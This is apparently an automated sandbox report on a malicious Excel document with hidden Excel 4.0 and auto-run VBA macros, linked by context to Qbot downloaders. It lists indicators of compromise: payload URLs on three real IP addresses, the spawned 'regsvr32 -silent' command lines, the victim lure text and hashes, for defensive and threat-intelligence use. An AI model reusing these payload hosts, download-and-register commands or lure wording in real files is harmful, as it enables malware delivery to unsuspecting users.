Loading ...

Play interactive tourEdit tour

Windows Analysis Report Document_1680405650-10062021.xls

Overview

General Information

Sample Name:Document_1680405650-10062021.xls
Analysis ID:498132
MD5:3d6a59b16e0992c234a9e649272d9183
SHA1:d40763ea2a87946c34137adcca9d72a9dbb4f190
SHA256:f0073fcb16de6f8c5c497d318853c3eaf9fb3d03d85ecaf009a33de179c879a2
Tags:xls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1500 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2552 cmdline: regsvr32 -silent ..\Celod.wac MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2852 cmdline: regsvr32 -silent ..\Celod.wac1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2908 cmdline: regsvr32 -silent ..\Celod.wac2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Document_1680405650-10062021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Celod.wac, CommandLine: regsvr32 -silent ..\Celod.wac, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1500, ProcessCommandLine: regsvr32 -silent ..\Celod.wac, ProcessId: 2552

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.107:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.107:80
    Source: global trafficHTTP traffic detected: GET /44475.7418916667.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.107Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44475.7418916667.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 94.140.114.111Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44475.7418916667.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.165.62.50Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.107
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.107
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.107
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.107
    Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.111
    Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.111
    Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.111
    Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.111
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.50
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.50
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.50
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.50
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.107
    Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.111
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.50
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.50
    Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.111
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.107
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Oct 2021 15:49:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.4.16Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Oct 2021 15:49:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.4.16Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Oct 2021 15:49:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.4.16Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0
    Source: Document_1680405650-10062021.xlsString found in binary or memory: http://188.165.62.50/
    Source: Document_1680405650-10062021.xlsString found in binary or memory: http://190.14.37.107/
    Source: Document_1680405650-10062021.xlsString found in binary or memory: http://94.140.114.111/
    Source: regsvr32.exe, 00000003.00000002.411932743.0000000001C70000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.412744168.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.413485083.0000000001DA0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: global trafficHTTP traffic detected: GET /44475.7418916667.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.107Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44475.7418916667.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 94.140.114.111Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44475.7418916667.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.165.62.50Connection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Document image extraction number: 0Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
    Source: Document image extraction number: 0Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 0Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: Document image extraction number: 1Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 1Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: Document_1680405650-10062021.xlsOLE, VBA macro line: Sub auto_close()
    Source: Document_1680405650-10062021.xlsOLE, VBA macro line: Sub auto_open()
    Source: Document_1680405650-10062021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: Document_1680405650-10062021.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Document_1680405650-10062021.xlsOLE indicator, Workbook stream: true
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wacJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD9CA.tmpJump to behavior
    Source: classification engineClassification label: mal64.expl.winXLS@7/2@0/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Document_1680405650-10062021.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting2Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting2NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://190.14.37.107/44475.7418916667.dat0%Avira URL Cloudsafe
    http://188.165.62.50/44475.7418916667.dat0%Avira URL Cloudsafe
    http://94.140.114.111/44475.7418916667.dat0%Avira URL Cloudsafe
    http://190.14.37.107/1%VirustotalBrowse
    http://190.14.37.107/0%Avira URL Cloudsafe
    http://188.165.62.50/0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    http://94.140.114.111/0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://190.14.37.107/44475.7418916667.datfalse
    • Avira URL Cloud: safe
    unknown
    http://188.165.62.50/44475.7418916667.datfalse
    • Avira URL Cloud: safe
    unknown
    http://94.140.114.111/44475.7418916667.datfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://190.14.37.107/Document_1680405650-10062021.xlsfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://188.165.62.50/Document_1680405650-10062021.xlsfalse
    • Avira URL Cloud: safe
    unknown
    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.411932743.0000000001C70000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.412744168.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.413485083.0000000001DA0000.00000002.00020000.sdmpfalse
    • Avira URL Cloud: safe
    low
    http://94.140.114.111/Document_1680405650-10062021.xlsfalse
    • Avira URL Cloud: safe
    unknown

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    94.140.114.111
    unknownLatvia
    43513NANO-ASLVfalse
    190.14.37.107
    unknownPanama
    52469OffshoreRacksSAPAfalse
    188.165.62.50
    unknownFrance
    16276OVHFRfalse

    General Information

    Joe Sandbox Version:33.0.0 White Diamond
    Analysis ID:498132
    Start date:06.10.2021
    Start time:17:48:11
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 59s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Document_1680405650-10062021.xls
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:7
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal64.expl.winXLS@7/2@0/3
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xls
    • Changed system and user locale, location and keyboard layout to English - United States
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
    • Report size getting too big, too many NtSetInformationFile calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    94.140.114.111Document_748968552-10062021.xlsGet hashmaliciousBrowse
    • 94.140.114.111/44475.7050777778.dat
    190.14.37.107Document_748968552-10062021.xlsGet hashmaliciousBrowse
    • 190.14.37.107/44475.7050777778.dat
    188.165.62.50Document_748968552-10062021.xlsGet hashmaliciousBrowse
    • 188.165.62.50/44475.7050777778.dat

    Domains

    No context

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    OffshoreRacksSAPADocument_748968552-10062021.xlsGet hashmaliciousBrowse
    • 190.14.37.107
    173536952-10042021.xlsGet hashmaliciousBrowse
    • 190.14.37.165
    UdQiakT3q5.xlsGet hashmaliciousBrowse
    • 190.14.37.187
    UdQiakT3q5.xlsGet hashmaliciousBrowse
    • 190.14.37.187
    Compensation-54975366-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    Compensation-54975366-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    CompensationClaim-1630636598-09282021.xlsGet hashmaliciousBrowse
    • 190.14.37.187
    CompensationClaim-1033191014-09282021.xlsGet hashmaliciousBrowse
    • 190.14.37.187
    xls.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    Compensation-2100058996-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    Compensation-1657705079-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    #Qbot downloader.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    Compensation-2308017-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    Compensation-1730406737-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    Claim-838392655-09242021.xlsGet hashmaliciousBrowse
    • 190.14.37.173
    claim.xlsGet hashmaliciousBrowse
    • 190.14.37.173
    Claim-1368769328-09242021.xlsGet hashmaliciousBrowse
    • 190.14.37.173
    Claim-1763045001-09242021.xlsGet hashmaliciousBrowse
    • 190.14.37.173
    NANO-ASLVDocument_748968552-10062021.xlsGet hashmaliciousBrowse
    • 94.140.114.111
    8AcNX5GzVY.exeGet hashmaliciousBrowse
    • 94.140.115.133
    4i2nattkLT.exeGet hashmaliciousBrowse
    • 141.136.0.203
    Document_1752244602-Copy.xlsGet hashmaliciousBrowse
    • 94.140.114.44
    Document_1752244602-Copy.xlsGet hashmaliciousBrowse
    • 94.140.114.44
    Document_1752244602-Copy.xlsGet hashmaliciousBrowse
    • 94.140.114.44
    qbot5.xlsxGet hashmaliciousBrowse
    • 94.140.114.44
    qbot5.xlsxGet hashmaliciousBrowse
    • 94.140.114.44
    qbot5.xlsxGet hashmaliciousBrowse
    • 94.140.114.44
    Document_85143683-Copy.xlsGet hashmaliciousBrowse
    • 94.140.114.44
    Document_5153204-Copy.xlsGet hashmaliciousBrowse
    • 94.140.114.44
    Document_143276485-Copy.xlsGet hashmaliciousBrowse
    • 94.140.114.44
    n5coKKBhuN.dllGet hashmaliciousBrowse
    • 94.140.115.104
    Pk1i5t2XLG.dllGet hashmaliciousBrowse
    • 94.140.115.104
    oAQ0OaThsMGet hashmaliciousBrowse
    • 83.241.70.43
    kecFPnbu5K.exeGet hashmaliciousBrowse
    • 94.140.114.174
    ac1khvFT2V.exeGet hashmaliciousBrowse
    • 141.136.0.129
    triage_dropped_file.dllGet hashmaliciousBrowse
    • 94.140.114.61
    date5.dllGet hashmaliciousBrowse
    • 94.140.114.61
    triage_dropped_file.dllGet hashmaliciousBrowse
    • 94.140.114.61

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):162688
    Entropy (8bit):4.254463966938546
    Encrypted:false
    SSDEEP:1536:C6OLrFNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CbNNSc83tKBAvQVCgOtmXmLpLm4l
    MD5:B9E2B9BAFAC03EFAC9F8586015724F6D
    SHA1:9BD2E03AB3171A1F1C2F737761AA2D3ACDE0A151
    SHA-256:413466669136250D3EAEB8BF440B69785783FAA70B6F2CB68978817769C4788E
    SHA-512:D7EB0BC9C04F0EDC45E8EB896418F35B1E6074A6624649500E4B4E3B3F44A84300859B294F3729EC3C6465284626B0020D97FC15F6F927CD37C8D062288F7BF3
    Malicious:false
    Reputation:low
    Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
    C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):15676
    Entropy (8bit):4.533034713957857
    Encrypted:false
    SSDEEP:192:fxBA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:fT8xesT20lheZ3waE5D7qxIxkxe
    MD5:1ADB3CF0BB04C8EA30EDC512F366E220
    SHA1:C6EEF574ECF64559618FD4439BD06638F46C35BD
    SHA-256:79C4F80CC36CFF260F1FA18DE1CB3BCEE889D9849FF4CB3EA3C4EF34CBBA067E
    SHA-512:AE028C1A681A4DC089609F78BEDFD7EFE82376FE33A0BE62424DE077DB92C4C0426DAC14EAFD2403078A5C9FD7E22CCE8076431328A806CA04E604B92B54AE2E
    Malicious:false
    Reputation:low
    Preview: MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... ...............rX..z0.E.;uK.62..........E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......|...K..a...

    Static File Info

    General

    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Wed Oct 6 08:51:31 2021, Security: 0
    Entropy (8bit):6.995654110144714
    TrID:
    • Microsoft Excel sheet (30009/1) 47.99%
    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
    File name:Document_1680405650-10062021.xls
    File size:136704
    MD5:3d6a59b16e0992c234a9e649272d9183
